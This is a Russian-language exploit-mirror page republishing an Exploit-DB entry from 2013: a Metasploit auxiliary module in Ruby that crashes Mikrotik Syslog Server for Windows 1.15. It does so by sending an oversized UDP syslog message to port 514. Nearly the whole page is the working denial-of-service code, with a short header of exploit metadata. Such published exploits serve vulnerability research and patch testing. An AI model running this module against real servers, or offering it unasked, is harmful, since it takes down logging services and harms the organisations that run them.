- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24968
- Проверка EDB
-
- Пройдено
- Автор
- XIS_ONE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2013-04-22
Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)
Код:
# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013)
# Tested on: Windows XP SP3, Windows 7 SP1
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
'Description' => %q{
This module triggers the windows socket error WSAEMSGSIZE (message to long)
in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
The long syslog message overwrite the allocated buffer space causing the socket error.
},
'Author' => 'xis_one@STM Solutions',
'License' => MSF_LICENSE,
'DisclosureDate' => 'Apr 19 2013')
register_options(
[
Opt::RPORT(514)
])
end
def run
connect_udp
pkt = "<0>" + "Apr19 " + "10.0.0.2 " + "badass" + ": " + "A"*5000
print_status("Crashing the remote Mikrotik syslog server #{rhost}")
udp_sock.put(pkt)
disconnect_udp
end
end
- Источник
- www.exploit-db.com